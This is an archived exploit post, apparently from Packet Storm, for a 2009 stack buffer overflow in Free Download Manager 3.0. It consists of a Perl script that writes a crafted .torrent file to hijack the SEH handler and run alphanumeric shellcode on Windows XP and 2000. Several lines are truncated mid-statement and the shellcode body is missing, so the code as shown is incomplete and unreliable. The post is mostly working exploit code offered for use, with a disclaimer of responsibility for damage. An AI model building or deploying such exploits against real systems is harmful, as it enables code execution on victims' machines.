Free Download Manager 3.0 Buffer Overflow

Type packetstorm
Reporter SkD
Modified 2009-02-03T00:00:00


# Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit  
# -----------------------------------------------------------  
# Exploit by SkD (  
# Vendors URL =  
# []  
# Download FDM 3.0 Build 844 =  
# []  
# (Downloaded by over 1.6 million users!)  
# This is another one of the more advanced exploitation methods  
# for buffer overflows using my method called "shell building".  
# It utilizes a SEH overflow and then a shellcode builder/assembler  
# "builds"/or "assembles" bytes that were deleted by transformation  
# of the buffer so that the shellcode will work without a flaw.  
# I have been able to do this because of my recent experiences with  
# UNICODE based overflows (heap & stack). This is a demonstration  
# of how you can obtain power with limitations to buffer.  
# Of course I could have used my shellhunting technique,  
# but this is a new method, and to demonstrate it in a world of  
# dying buffer overflows is important for me.  
# Unfortunately I did not have time to make this a universal exploit  
# so it will only work on all NT systems EXCEPT Vista (due to randomized  
# heap, etc). But with a few modifications it can work (sure of it).  
# Read my notes & comments in the script for more info.  
# Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4.  
# Note: Author has no responsibility over the damage you do with this!  
use strict;  
use warnings;  
my $tdata1 = "\x64\x38\x3A\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x31\x32\x3A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x37\x3A\x63\x6F\x6D".  
my $tdata2 = "\x31\x32\x3A\x70\x69\x65\x63\x65\x20\x6C\x65\x6E\x67\x74\x68\x69\x32\x36\x32\x31\x34\x34\x65\x36\x3A\x70\x69\x65\x63\x65\x73".  
# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum  
my $shellcode =  
#Notice I added 0x01 byte before each 0x80=> byte.  
#This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does  
#the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes).  
#You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add  
#0x01 before each 0x80=> byte.  
my $shellcode_builder = ("\x59" x 3 ."\x40" x 9 . "\x51\x5b"."\x4b" x 4 ."\x01\x03"."\x48" x 10 ."\x43\x01\x03" x 3).  
("\x4b" x 3 ."\x03\x0b" x 35 ."\x41" x 14 ."\x41\x01\x01\x01\x01"."\x41\x01\x01" x 2).  
("\x49" x 3 ."\x48"."\x01\x01" x 5 ."\x40" x 3 ."\x01\x01\x41\x01\x01").  
("\x49" x 2 ."\x48" x 3 ."\x01\x01" x 13 ."\x40" x 3 ."\x01\x01\x41\x01\x01").  
("\x49" x 3 ."\x48" x 3 ."\x01\x01" x 11 ."\x49" x 3 ."\x01\x01" x 11).  
("\x40" x 3 ."\x41\x01\x01"."\x41" x 3 ."\x01\x01"."\x41" x 6 ."\x01\x01");  
my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack #and set everything in the right places(ret,addr,etc).  
my $shellcode_builder_label = "\x01\x01\x01\x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location.  
my $overflow1 = "\x41" x 10000;  
my $overflow2 = "\x41" x $len;  
my $sled = "\x41" x (350 - length($shellcode_builder));  
my $sehjmp = "\x71\x06\x01\x01"; #Since we cannot use 0xEB, I am going to use another type of jump ;)  
my $sehret = "\x1a\x09\x03\x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems)  
open(my $torrent, "> s.torrent");  
print $torrent $tdata1.  
close $torrent;